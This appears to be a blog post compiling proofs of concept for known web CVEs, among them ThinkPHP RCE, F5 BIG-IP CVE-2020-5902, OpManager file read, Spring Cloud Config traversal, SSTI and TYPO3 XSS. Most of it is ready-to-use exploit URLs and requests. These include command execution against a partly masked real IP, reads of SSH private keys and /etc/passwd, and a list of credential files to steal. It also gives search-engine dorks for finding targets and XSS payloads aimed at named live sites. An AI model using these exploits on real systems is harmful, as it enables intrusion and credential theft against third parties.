Mad-robot (37)

Description:-
SAP NetWeaver AS JAVA (LM Configuration Wizard), versions – 7.30, 7.31, 7.40, 7.50, does not perform an authentication check which allows an attacker without prior authentication to execute configuration tasks to perform critical actions against the SAP Java system, including the ability to create an administrative user, and therefore compromising Confidentiality, Integrity and Availability of the system, leading to Missing Authentication Check.

POC
https://github.com/chipik/SAP_RECON/blob/master/RECON.py

Totaljs – Unathenticated Directory Traversal

DESCRIPTION
User can make requests like “GET /../databases/settings.json
HTTP/1.1” and include file contents from outside the /public
the directory which is the default directory for accessible static files.

Refer:-
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8903

PROOF OF CONCEPT

$ curl -v --path-as-is
http://127.0.0.1:8000/.%2e/databases/settings.json 

#(note that .json is in the extensions list by def.)

Totaljs – Unathenticated Directory Traversal

DESCRIPTION
User can make requests like “GET /../databases/settings.json
HTTP/1.1” and include file contents from outside the /public
the directory which is the default directory for accessible static files.

Refer:-
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8903

PROOF OF CONCEPT

$ curl -v --path-as-is
http://127.0.0.1:8000/.%2e/databases/settings.json 

#(note that .json is in the extensions list by def.)

Google dork:- inurl:/api/jsonws

Shodan:- Powered+By+Liferay

publicwww:-https://publicwww.com/websites/Powered+By+Liferay/

POC:-
https://github.com/mzer0one/CVE-2020-7961-POC

ThinkPHP RCE

DESCRIPTION

ThinkPHP before 3.2.4, as used in Open Source BMS v1.1.1 and other products, allows Remote Command Execution via public//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]= followed by the command.

PROOF OF CONCEPT
The RCE(Remote Command Execution) vulnerability is triggered by a http request.Successfully executed the command “whoami”.
poc:

http://58.82.XXX.XXX:8080/public//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

Next.js Path traversal

DESCRIPTION

Next.js versions before 9.3.2 have a directory traversal vulnerability. Attackers could craft special requests to access files in the dist directory (.next). This does not affect files outside of the dist directory (.next). In general, the dist directory only holds build assets unless your application intentionally stores other assets under this directory. This issue is fixed in version 9.3.2.

PROOF OF CONCEPT

HTTP://localhost/_next/static/../server/pages-manifest.json

Unauthenticated arbitrary file read on ManageEngine OpMange

DESCRIPTION

The latest release of OpManger contains a directory traversal vulnerability that allows unrestricted access to every file in the OpManager application. This includes private SSH keys, password protected Java keystores, and configuration files containing passwords to keystores, private certificates, and the backend database. If LDAP is configured then domain credentials can be obtained from “conf/OpManager/ldap.conf”.

PROOF OF CONCEPT
REQUEST:

GET /cachestart/125116/cacheend/apiclient/fluidicv2/javascript/jquery/../../../../bin/.ssh_host_rsa_key HTTP/1.1
Host: <HOSTNAME>:8060
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: close
Cache-Control: max-age=0
Referer: http://<HOSTNAME>:8060/

RESPONSE:

HTTP/1.1 200 
Set-Cookie: JSESSIONID=4E221B342BC080BC9AC2D19378364E3B; Path=/; HttpOnly
X-FRAME-OPTIONS: DENY
Accept-Ranges: bytes
ETag: W/"902-1586033949624"
Last-Modified: Sat, 04 Apr 2020 20:59:09 GMT
Vary: Accept-Encoding
Date: Mon, 13 Apr 2020 15:40:01 GMT
Connection: close
Content-Length: 902

-----BEGIN RSA PRIVATE KEY-----
MIICX...pXqnO
-----END RSA PRIVATE KEY-----

Here are the files you can read

                "bin/.ssh_host_dsa_key",
		"bin/.ssh_host_dsa_key.pub",
		"bin/.ssh_host_rsa_key",
		"bin/.ssh_host_rsa_key.pub",
		"conf/client.keystore",
		"conf/customer-config.xml",
		"conf/database_params.conf",
		"conf/FirewallAnalyzer/aaa_auth-conf.xml",
		"conf/FirewallAnalyzer/auth-conf_ppm.xml",
		"conf/gateway.conf",
		"conf/itom.truststore",
		"conf/netflow/auth-conf.xml",
		"conf/netflow/server.xml",
		"conf/netflow/ssl_server.xml",
		"conf/NFAEE/cs_server.xml",
		"conf/OpManager/database_params.conf",
		"conf/OpManager/database_params_DE.conf",
		"conf/OpManager/ldap.conf",
		"conf/OpManager/MicrosoftSQL/database_params.conf",
		"conf/OpManager/POSTGRESQL/database_params.conf",
		"conf/OpManager/POSTGRESQL/database_params_DE.conf",
		"conf/OpManager/securitydbData.xml",
		"conf/OpManager/SnmpDefaultProperties.xml",
		"conf/Oputils/snmp/Community.xml",
		"conf/Persistence/DBconfig.xml",
		"conf/Persistence/persistence-configurations.xml",
		"conf/pmp/PMP_API.conf",
		"conf/pmp/pmp_server_cert.p12",
		"conf/product-config.xml",
		"conf/SANSeed.xml",
		"conf/server.keystore",
		"conf/server.xml",
		"conf/system_properties.conf",
		"conf/tomcat-users.xml",
		"lib/OPM_APNS_Cert.p12"

Directory Traversal with spring-cloud-config-server

DESCRIPTION

Spring Cloud Config, 2.2.x versions before 2.2.3, 2.1.x versions before 2.1.9, and older unsupported versions allow applications to provide arbitrary configuration files through the spring-cloud-config-server module. Malicious users or attackers can use specially crafted URLs to send requests, which may lead to directory traversal attacks.

PROOF OF CONCEPT

http://127.0.0.1:8889/flag.txt%23/222/..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29tmp%28_%29

http://127.0.0.1:8889/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Ftmp%252Fflag.txt%23/222/11

http://127.0.0.1:8889/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/222/11

Video POC

https://video.twimg.com/tweet_video/Eah0d6rVAAApHM_.mp4

Description-

The SEOmatic component before 3.3.0 for Craft CMS allows Server-Side Template Injection that leads to RCE via malformed data to the metacontainers controller.

POC-

HTTP://localhost/actions/seomatic/meta-container/meta-link-container/?uri={{7+'7'}}
HTTP://localhost/actions/seomatic/meta-container/all-meta-containers?uri={{7+'7'}}

DESCRIPTION-

TYPO3 6.2.0 to 6.2.38 ELTS and TYPO3 7.0.0 to 7.1.0 (CVE-2020-8091). These versions embed a third-party component named SVG Web which provides svg.swf, a Flash file vulnerable to cross-site scripting.

Google Dork

inurl:"typo3/contrib/websvg"

Works on IE

PROOF OF CONCEPT-
Payload: svg.swf?uniqueId=%22])}catch(e){if(!this.x)alert("XSS"),this.x=1}//

Live sites:

https://www.bulac.fr/typo3/contrib/websvg/svg.swf?uniqueId=%22])}catch(e){if(!this.x)alert(%22XSS%22),this.x=1}//

www.roz.si/typo3/contrib/websvg/svg.swf?uniqueId=%22])}catch(e){if(!this.x)alert(%22XSS%22),this.x=1}//

www.urbanek-consulting.com/typo3/contrib/websvg/svg.swf?uniqueId=%22])}catch(e){if(!this.x)alert(%22XSS%22),this.x=1}//

CVE-2020-5902

In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.

 /tmui/login.jsp/..;/tmui/system/user/authproperties.jsp

/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa

/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

Patch & Mitigation:-

<LocationMatch ".*\.\.;.*">
Redirect 404 /
</LocationMatch>

Versions Effected

• BIG-IP 15.x: 15.1.0/15.0.0
  
• BIG-IP 14.x: 14.1.0 ~ 14.1.2
  
• BIG-IP 13.x: 13.1.0 ~ 13.1.3
  
• BIG-IP 12.x: 12.1.0 ~ 12.1.5
  
• BIG-IP 11.x: 11.6.1 ~ 11.6.5
  

Dorks
https://beta.shodan.io/search?query=vuln%3Acve-2020-5902

https://www.shodan.io/search?query=http.favicon.hash%3A-335242539+%223992%22